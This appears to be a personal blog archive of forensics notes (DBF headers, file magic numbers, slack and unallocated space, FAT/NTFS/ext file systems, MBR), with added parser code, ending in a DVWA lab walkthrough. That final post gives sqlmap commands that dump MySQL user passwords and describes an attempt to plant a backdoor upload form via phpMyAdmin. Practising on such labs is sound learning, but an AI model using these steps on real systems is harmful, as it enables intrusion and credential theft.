Sunday, 18 March 2012

DBF File structure


Understanding Digital Image Formats

There are many digital image formats available, but only some of them are optimized for web use. For example, the TIFF image format is not designed for the web; it is used for printing. Examples of image formats for the web are JPEG, PNG, GIF, and SVG.
Why are certain image formats suitable for the web while others are not? Because images on the web must be optimized and highly compressed so that they do not get too large.
Some digital image formats, especially those designed for print (such as TIFF), carry so much resolution, metadata, and color richness (all of which become irrelevant when viewed on computer monitors) that their file size is too big for web use.


A DBF file consists of a header record and data records. The header record defines the structure of the DBF file and contains any other information related to the table. The header record starts at file position zero. Data records follow the header, in consecutive bytes, and contain the actual text of the fields.
Note: The data in a DBF file starts at the position indicated in bytes 8 to 9 of the header record. Each data record begins with a delete-flag byte. If this byte is an ASCII space (0x20), the record is not deleted; if it is an asterisk (0x2A), the record is deleted. The data from the fields named in the field subrecords follows the delete flag.
The length of a record, in bytes, is determined by summing the defined lengths of all fields. Integers in DBF files are stored with the least significant byte first (little-endian).

DBF File Header

Byte offset      Description
0                DBF file type:
                   0x02   FoxBASE
                   0x03   FoxBASE+/dBASE III PLUS, no memo
                   0x30   Visual FoxPro
                   0x31   Visual FoxPro, autoincrement enabled
                   0x32   Visual FoxPro with field type Varchar or Varbinary
                   0x43   dBASE IV SQL table files, no memo
                   0x63   dBASE IV SQL system files, no memo
                   0x83   FoxBASE+/dBASE III PLUS, with memo
                   0x8B   dBASE IV with memo
                   0xCB   dBASE IV SQL table files, with memo
                   0xF5   FoxPro 2.x (or earlier) with memo
                   0xE5   HiPer-Six format with SMT memo file
                   0xFB   FoxBASE
1 - 3            Last update (YYMMDD)
4 - 7            Number of records in file
8 - 9            Position of first data record
10 - 11          Length of one data record, including delete flag
12 - 27          Reserved
28               Table flags:
                   0x01   file has a structural .cdx
                   0x02   file has a Memo field
                   0x04   file is a database (.dbc)
                 This byte can contain the sum of any of the above values. For example, the value 0x03 indicates the table has a structural .cdx and a Memo field.
29               Code page mark
30 - 31          Reserved, contains 0x00
32 - n           Field subrecords
                 The number of fields determines the number of field subrecords. One field subrecord exists for each field in the table.
n+1              Header record terminator (0x0D)
n+2 to n+264     Visual FoxPro only: a 263-byte range that contains the backlink information, which is the relative path of an associated database (.dbc) file. If the first byte is 0x00, the file is not associated with a database. Therefore, database files always contain 0x00.

Field Subrecords Structure

Byte offset      Description
0 - 10           Field name with a maximum of 10 characters. If less than 10, it is padded with null characters (0x00).
11               Field type:
                   C   -   Character
                   Y   -   Currency
                   N   -   Numeric
                   F   -   Float
                   D   -   Date
                   T   -   DateTime
                   B   -   Double
                   I   -   Integer
                   L   -   Logical
                   M   -   Memo
                   G   -   General
                   C   -   Character (binary)
                   M   -   Memo (binary)
                   P   -   Picture
                   +   -   Autoincrement (dBase Level 7)
                   O   -   Double (dBase Level 7)
                   @   -   Timestamp (dBase Level 7)
12 - 15          Displacement of field in record
16               Length of field (in bytes)
17               Number of decimal places
18               Field flags:
                   0x01   System column (not visible to user)
                   0x02   Column can store null values
                   0x04   Binary column (for CHAR and MEMO only)
                   0x06   (0x02+0x04) When a field is NULL and binary (Integer, Currency, and Character/Memo fields)
                   0x0C   Column is autoincrementing
19 - 22          Value of autoincrement Next value
23               Value of autoincrement Step value
24 - 31          Reserved
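As an added example (not code from the original post), the two tables above turned into a small Python parser. It reads the 32-byte header and the 32-byte field subrecords with little-endian unpacking, then checks the things a careless reader skips: the 0x0D terminator before the data start, the record length against the sum of field lengths, and the record count against the file size. The sample table (file type 0x03, fields NAME and AGE) is constructed inline.

```python
import struct
from dataclasses import dataclass

@dataclass
class DbfField:
    name: str
    ftype: str
    length: int
    decimals: int
    flags: int
@dataclass
class DbfHeader:
    file_type: int
    last_update: tuple     # (yy, mm, dd) from bytes 1-3
    record_count: int      # bytes 4-7
    first_record: int      # bytes 8-9
    record_length: int     # bytes 10-11, includes the delete flag
    table_flags: int       # byte 28
    fields: list

def parse_dbf_header(data: bytes) -> DbfHeader:
    """Parse the 32-byte header and the 32-byte field subrecords (all little-endian)."""
    if len(data) < 32:
        raise ValueError("truncated DBF header")
    ftype, yy, mm, dd, nrec, first, reclen = struct.unpack_from("<BBBBIHH", data, 0)
    fields, off = [], 32
    # Subrecords run until the 0x0D terminator and must end before the data area starts.
    while off + 32 <= min(first, len(data)) and data[off] != 0x0D:
        raw_name, tcode, _disp, length, dec, flags = struct.unpack_from("<11scIBBB", data, off)
        name = raw_name.split(b"\x00", 1)[0].decode("ascii", "replace")
        fields.append(DbfField(name, tcode.decode("ascii", "replace"), length, dec, flags))
        off += 32
    if off >= len(data) or data[off] != 0x0D:
        raise ValueError("field subrecords are not terminated by 0x0D before the data start")
    # Record length in the header must equal delete flag + sum of field lengths.
    if 1 + sum(f.length for f in fields) != reclen:
        raise ValueError("record length disagrees with the field definitions")
    # Never trust the record count blindly: the records must fit in the file.
    if first + nrec * reclen > len(data):
        raise ValueError("header claims more records than the file contains")
    return DbfHeader(ftype, (yy, mm, dd), nrec, first, reclen, data[28], fields)

def read_records(data: bytes, hdr: DbfHeader) -> list:
    """Return (deleted, {field_name: raw_bytes}) for every record after the header."""
    out = []
    for i in range(hdr.record_count):
        rec = data[hdr.first_record + i * hdr.record_length:][:hdr.record_length]
        if rec[0] not in (0x20, 0x2A):          # space = live, asterisk = deleted
            raise ValueError(f"record {i}: unexpected delete flag {rec[0]:#x}")
        vals, pos = {}, 1
        for f in hdr.fields:
            vals[f.name] = rec[pos:pos + f.length]
            pos += f.length
        out.append((rec[0] == 0x2A, vals))
    return out

def build_sample() -> bytes:
    """Constructed sample: dBASE III (0x03) table with NAME C(10) and AGE N(3), two records."""
    fields = [(b"NAME", b"C", 1, 10), (b"AGE", b"N", 11, 3)]
    records = [b" " + b"alice".ljust(10) + b" 30", b"*" + b"bob".ljust(10) + b" 41"]
    first, reclen = 32 + 32 * len(fields) + 1, 1 + 10 + 3
    out = struct.pack("<BBBBIHH", 0x03, 12, 3, 18, len(records), first, reclen)
    out += b"\x00" * 16 + bytes([0x00, 0x00]) + b"\x00\x00"   # reserved, flags, code page, reserved
    for name, tcode, disp, length in fields:
        out += struct.pack("<11scIBBB", name, tcode, disp, length, 0, 0) + b"\x00" * 13
    return out + b"\x0D" + b"".join(records) + b"\x1A"       # 0x1A: conventional EOF marker
```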



Magic Number

      In computer programming, the term magic number has multiple meanings. It could refer to one or more of the following:

Magic numbers are common in programs across many operating systems. Magic numbers implement strongly typed data and are a form of in-band signaling to the controlling program that reads the data type(s) at program run-time. Many files have such constants that identify the contained data. Detecting such constants in files is a simple and effective way of distinguishing between many file formats and can yield further run-time information.

  • Headers in ZIP files begin with "PK" (50 4B), the initials of Phil Katz, author of DOS compression utility PKZIP.
  • Microsoft Office document files start with D0 CF 11 E0, which is visually suggestive of the word "DOCFILE0".
  • WAD files start with IWAD or PWAD (for Doom), WAD2 (for Quake) and WAD3 (for Half-Life).
  • LLVM Bitcode files start with BC (0x42, 0x43)
  • Unicode text files encoded in UTF-16 often start with the Byte Order Mark to detect endianness (FE FF for big endian and FF FE for little endian). UTF-8 text files often start with the UTF-8 encoding of the same character, EF BB BF.
  • TIFF files begin with either II or MM followed by 42 as a two-byte integer in little- or big-endian byte order. II is for Intel, which uses little-endian byte order, so the magic number is 49 49 2A 00; MM is for Motorola, which uses big-endian byte order, so the magic number is 4D 4D 00 2A.
  • and so on.
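An added example (not from the original post) that identifies a file from the signatures listed above. The TIFF and UTF-16 branches show why a plain prefix match is not enough: the byte-order marker decides how the following bytes are read, so the 42 is checked in the indicated endianness. The signature table and the sample inputs are constructed here.

```python
import struct

# Fixed-prefix signatures from the list above (constructed table, prefix -> label).
FIXED_MAGICS = [
    (b"PK", "zip"),
    (b"\xD0\xCF\x11\xE0", "ms-office-cfb"),
    (b"IWAD", "wad-doom"), (b"PWAD", "wad-doom"),
    (b"WAD2", "wad-quake"), (b"WAD3", "wad-halflife"),
    (b"BC", "llvm-bitcode"),
    (b"\xEF\xBB\xBF", "utf8-bom-text"),
]

def sniff(data: bytes) -> dict:
    """Return {"type": label, "endian": "little"/"big"/None} from the leading bytes."""
    head = data[:4]
    # TIFF: the first two bytes select the byte order used to read the 42 that follows.
    if head[:2] in (b"II", b"MM") and len(head) == 4:
        fmt = "<H" if head[:2] == b"II" else ">H"
        (magic,) = struct.unpack(fmt, head[2:4])
        if magic == 42:
            return {"type": "tiff", "endian": "little" if fmt == "<H" else "big"}
        return {"type": "unknown", "endian": None}   # II/MM without 42 is not TIFF
    # UTF-16 BOM: the marker itself tells you the endianness of the rest of the text.
    if head[:2] == b"\xFE\xFF":
        return {"type": "utf16-text", "endian": "big"}
    if head[:2] == b"\xFF\xFE":
        return {"type": "utf16-text", "endian": "little"}
    for prefix, label in FIXED_MAGICS:
        if data.startswith(prefix):
            return {"type": label, "endian": None}
    return {"type": "unknown", "endian": None}
```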

Unallocated space

What is unallocated space?

Unallocated space, sometimes called "free space", is logical space on a hard drive that the operating system (e.g. Windows) can write to. To put it another way, it is the opposite of "allocated" space, which is where the operating system has already written files.

Examples

If the operating system writes a file to a certain area of the hard drive, that part of the drive is now "allocated": the file is using that space, and no other files can be written to that section. If that file is deleted, that part of the hard drive no longer needs to be "allocated" and becomes unallocated. This means that new files can now be written to that location.

On a standard, working computer, files can only be written to unallocated space.

If a newly formatted drive is connected to a computer, virtually all of the drive space is unallocated (a small amount of space is taken up by files within the file system, e.g. $MFT). On a new drive the unallocated space is normally all zeros; as files are written to the hard drive, the zeros are overwritten with the file data.


Working Example

Blank Drive

A freshly formatted (NTFS) 500 GB hard drive starts with 99.9% unallocated space; we will assume it is 100% to make the maths slightly easier. All of the unallocated space will be zeros, literally 00 00 00 written on the hard drive.

If a 5 GB file, e.g. a large movie, is placed on the drive, then there will be 1% (5 GB) allocated space and 99% unallocated (495 GB).

If a 10 GB database file is now added to this hard drive, there will be a total of 3% (15 GB) allocated space and 485 GB unallocated space. New files will only be written into the remaining unallocated space.

What happens when a file is deleted?

If the movie file from the above example is deleted, the allocated space it was using becomes unallocated. That is, there will now be 2% allocated space (the 10 GB database) and 98% unallocated space.

However, the data from the movie file is still on the hard drive; it does not just disappear, only its status changes. This means that the following situation now exists:

There is 10 GB of allocated space and 490 GB of unallocated space.

Of the 490 GB, 485 GB would be all zeros, but 5 GB of the unallocated space would be the old movie data.

Until new files are written to the hard drive, the movie file remains deleted but still recoverable. Even when new files are written, they must overwrite the same unallocated space the movie file occupies before the movie file is destroyed.

Unallocated space can only be accessed with specialist tools, and not directly from Windows. Such tools include:

SLACK SPACE

Slack space is the area between the end of a file and the end of the last cluster or sector used by the file in question. This area will not be used again to store information, so it is "wasted". Slack space is common in file systems that use a large cluster size, while a file system that uses a small cluster size can organize the storage media more effectively and efficiently. The amount of wasted disk space can be estimated by multiplying the number of files (including the number of directories) by half the cluster size. For example, a personal computer storing 10,000 files in a file system with a 4 kilobyte cluster size will waste approximately 10,000 x 2 KB = 20,000 KB. On a large file server, slack space can even reach tens of gigabytes.

Illustration of slack space on a hard drive

Slack space refers to portions of a hard drive that are not fully used by the currently allocated file and which may contain data from a previously deleted file.

In the example above, saving a 768-byte file (named User_File.txt) requires only sector 1 and half of sector 2 in the cluster. Depending on the operating system, the remaining 256 bytes in sector 2 might be filled with 1s or 0s or might simply remain intact. Sectors 3 and 4 would not be overwritten and are thus considered slack space. If the slack space previously contained data from a deleted file, this information could be recovered with forensic tools.

Additional details: operating systems allocate files on a hard drive using clusters, which are collections of contiguous sectors. Because a cluster is the smallest allocation unit an operating system can address, if a file does not use the full cluster, a portion of the remaining space may not be overwritten and might contain data from a previously deleted file. For forensic analysts, it is important to understand that slack space is considered allocated space, since it is part of an allocated cluster. As such, special tools must be used to extract and analyse slack space; an analysis of unallocated data will not contain any slack space data.

Thursday, 15 March 2012

File Allocation Table (FAT)

*** FAT16

    FAT16 is a file system whose allocation units are addressed with 16 bits, so it can hold up to 2^16 allocation units (65,536). This file system has a capacity limit of 4 gigabytes. The allocation unit size used by a FAT16 partition depends on the capacity being formatted: if the partition is smaller than 16 megabytes, Windows uses the FAT12 file system, and if the partition is larger than 16 megabytes, Windows uses FAT16. The following table lists the operating systems that support the FAT16 file system.

How a file is stored in a FAT16 volume

The FAT16 file system uses the allocation unit (or cluster) as the smallest unit in which it can store a file. FAT16 supports clusters of 1 to 128 sectors. Furthermore, each directory entry provides enough space to hold a file name in 8.3 format (eight characters for the name plus three for the extension). Directory entries in the FAT16 file system are 32 bytes each, one for every file and subdirectory contained in the directory. The directory entry contains the following fields.

The organizational structure of the FAT16 file system is not too complicated. A file is placed at the first free location the file system finds in the partition. The file system then records a location number, called the cluster number, which is the address of the cluster where the file begins. Each cluster's table entry contains a pointer to the next cluster of the same file, or an indication that the cluster in question is the end of the file's chain of clusters, marked by the hexadecimal value 0xFFFF (FAT16) or 0xFFF (FAT12). For example, a file that uses 10 clusters has 10 entries in the file allocation table: 9 of them link to the next entry, while the last cluster's entry contains the end-of-chain marker 0xFFFF. This kind of file system structure is generally called a linked-list structure.
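An added example (not the blog's own code) that walks a FAT16 cluster chain exactly as the linked-list description above says. The table layout is constructed here, and the end-of-chain test accepts the range 0xFFF8 to 0xFFFF (real implementations treat all of these as end markers; 0xFFFF is the value the text names) as an assumption beyond the text. A loop or a pointer into a free cluster, which a corrupted or crafted image can contain, is rejected instead of being followed forever.

```python
FAT16_FREE = 0x0000
FAT16_BAD = 0xFFF7
FAT16_EOC_MIN = 0xFFF8   # 0xFFF8..0xFFFF all mark the last cluster; 0xFFFF is the usual value

def parse_fat16(raw: bytes) -> list:
    """Decode a raw FAT16 table: one 16-bit little-endian entry per cluster."""
    if len(raw) % 2:
        raise ValueError("FAT16 table length must be a multiple of 2")
    return [int.from_bytes(raw[i:i + 2], "little") for i in range(0, len(raw), 2)]

def walk_chain(fat: list, start: int) -> list:
    """Follow the linked list from `start` to its end-of-chain marker.
    A corrupted or hostile table can loop or point at free/bad/reserved clusters;
    both are rejected rather than followed forever."""
    chain, seen, cur = [], set(), start
    while True:
        if cur < 2 or cur >= len(fat):          # entries 0 and 1 are reserved, not data
            raise ValueError(f"cluster {cur:#06x} is outside the data area")
        if cur in seen:
            raise ValueError(f"loop detected at cluster {cur:#06x}")
        seen.add(cur)
        chain.append(cur)
        nxt = fat[cur]
        if nxt >= FAT16_EOC_MIN:
            return chain
        if nxt == FAT16_FREE:
            raise ValueError(f"cluster {cur:#06x} points at a free cluster")
        if nxt == FAT16_BAD or 0xFFF0 <= nxt < FAT16_EOC_MIN:
            raise ValueError(f"cluster {cur:#06x} points at bad/reserved entry {nxt:#06x}")
        cur = nxt

def chain_bytes(chain: list, sectors_per_cluster: int, bytes_per_sector: int = 512) -> int:
    """Disk space a chain occupies; FAT16 clusters are 1 to 128 sectors."""
    if not 1 <= sectors_per_cluster <= 128:
        raise ValueError("FAT16 cluster size must be 1 to 128 sectors")
    return len(chain) * sectors_per_cluster * bytes_per_sector

def build_sample_fat() -> bytes:
    """Constructed 16-entry table: file A at 2 -> 3 -> 5 (end), a loop 7 <-> 8,
    and a chain at 9 that runs into free cluster 10."""
    entries = [0xFFF8, 0xFFFF, 3, 5, 0, 0xFFFF, 0, 8, 7, 10, 0, 0, 0, 0, 0, 0]
    return b"".join(e.to_bytes(2, "little") for e in entries)
```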

*** FAT32

    FAT32 is the most recent version of the FAT file system; it was introduced when Microsoft released Windows 95 OEM Service Release 2 (Windows 95 OSR2). The Windows operating systems that support the FAT32 file system are listed in the following table.


Because it uses a larger (32-bit) file allocation table, FAT32 can theoretically address up to 2^32 allocation units (4,294,967,296). Nevertheless, in its implementation the number of allocation units FAT32 can address is 2^28 (268,435,456). The maximum allocation unit size is 32,768 bytes (64 sectors), so in theory a volume can hold 8 terabytes (8,192 gigabytes), although this is not recommended. In addition, the installation program of the Windows NT 5.x family and later only allows the creation of FAT32 partitions of up to 32 gigabytes (for partitions larger than 32 GB, the Windows installation program offers only the NTFS file system). When installing Windows NT 5.x and above, if the partition on which Windows is installed is smaller than 2 gigabytes, the installation program uses FAT16; conversely, if the partition is larger than 2 gigabytes, the installation program uses FAT32.

FAT32 uses a smaller allocation unit size than FAT12/FAT16, so FAT32 is more efficient on large partitions (larger than 512 megabytes). The space saved by FAT32 compared with FAT16/FAT12 is approximately 20% to 27%. Windows 98 has a utility that can convert a FAT16 partition to FAT32 without losing data.

*** NTFS (New Technology File System)

NTFS was first introduced in Windows NT and is a file system completely different from FAT technology. NTFS offers better security, file compression, clusters, and even support for data encryption. NTFS is the default file system for Windows XP; if you do a regular upgrade you will be asked whether you want to upgrade to NTFS or keep using FAT. If you are upgrading to Windows XP and do not switch to NTFS, it does not matter, because you can convert to NTFS at any time. Remember, however, that if you are using NTFS, a problem arises if you want to downgrade to FAT without losing data.
NTFS is generally not compatible with another operating system installed on the same computer (dual boot), and it is not even detected when you boot from a floppy. It is therefore advisable to provide a small partition using the FAT file system at the beginning of the disk. This partition lets you save recovery tools in case you get into trouble.


*** Ext2 (Second Extended)


EXT2 is a powerful file system in Linux; it is one of the most robust file systems and the foundation of all Linux distributions. In the EXT2 file system, file data is stored as data blocks. All data blocks have the same length, and although the length varies between EXT2 file systems, the block size is determined when the file system is created with the mke2fs command. If the block size is 1024 bytes, then a 1025-byte file will occupy two blocks. This means that, on average, we waste half a block per file.
EXT2 defines the file system topology by associating every file on the system with an inode data structure. An inode records which blocks hold a file's data, the file's access rights, its modification time, and its type. Each file in the EXT2 file system has a single inode, and each inode has a unique identification number. Inodes are stored in the file system's inode table. A directory in the EXT2 file system is a special file that contains a pointer to the inode of each entry in the directory.


*** Ext3 (Third Extended)
EXT3 is an improved version of the EXT2 file system. The improvements bring several advantages, including:
a. Recovery after failure: after a resource failure, an "unclean shutdown", or damage to the system, an EXT2 file system must go through a check with the e2fsck program. This process can take so long that the boot process becomes very slow, especially for large disks containing lots of data, and during the check all data is inaccessible. The journal provided by EXT3 means the data no longer needs to be checked after a system failure. EXT3 is only checked if there is hardware damage, such as a failing hard disk, and such events are very rare. The time EXT3 needs after an "unclean shutdown" does not depend on the size of the file system or the number of files, but on the size of the journal used to maintain consistency. The default journal takes about a second to recover, depending on the hardware speed.
b. Data integrity: EXT3 ensures data integrity after damage or an "unclean shutdown". EXT3 lets you choose the type of protection and the type of data protected.
c. Speed: instead of writing data more than once, EXT3 has greater throughput than EXT2 because it optimizes hard disk head movement. We can choose among three journal modes to maximize speed, but then data integrity is not assured.
d. Easy migration: we can move from EXT2 to EXT3 without reformatting.


Wednesday, 14 March 2012

Master Boot Record (MBR)

The MBR is also sometimes referred to as the master boot block or master partition boot sector. The MBR is the first sector of the computer's hard disk drive; it tells the computer how the hard drive is partitioned and how to load the operating system.

The above picture is an example of what a partitioned hard disk drive may look like. In this case, the MBR is the first section of the hard disk drive the computer looks at after the BIOS hands control to the first bootable drive. Unlike the VBR, there is only ever a maximum of one MBR on a partitioned hard drive.

The MBR is also susceptible to boot sector viruses that can corrupt or remove the MBR, which can leave the hard drive unusable and prevent the computer from booting up. The Stoned Empire Monkey virus, for example, is an MBR virus.

Monday, 05 March 2012

SQL INJECTION DVWA (MEDIUM)

In this case I am using Backtrack 5 r1 as the server.

1. Access DVWA at "http://192.168.56.1/dvwa"

user name : admin
password : password
2. Set security to MEDIUM


3. Open Mantra and Burp Suite

on the mantra following refuse step

Create a proxy for Burp Suite

Open Burp Suite


4. Using the Burp Suite proxy, then using '

Showing in the URL


Result in Burp Suite


5. Run sqlmap
root@bt:/pentest/database/sqlmap# 


Showing result


Search table



Search column



Now we can see the user and password

Showing





6. OK, we got the password, but our mission is to make a backdoor on the server.. hmmm, so we must try to exploit a service.. I will try the MySQL service.

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=33486pplno180m3afq6jpjout3" --dbs


I have tried a lot of ways but.. I can't upload a backdoor.. to be continued...
=======================================================================

After trying again with repeated approaches..

>>>root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql --tables



>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -T user --column


>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" -D mysql -C password --dump


>>> root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "security=medium; PHPSESSID=qnvb1hs955kql44vc5pr6a6ch6" --users --password



We can see that the password we get is the same.

>>> I try to open MySQL

I'm using password: root
and we can see I can manage the database.. we will try to open phpMyAdmin

>>> localhost/phpmyadmin
user : root
password : root



>>> Created database
Sinobi_db;

>>> Created table form

>>> Created table upload


>>> Created a form for upload.. "way for Backdoor"
Insert the data into table camp

>>> Insert data into table upload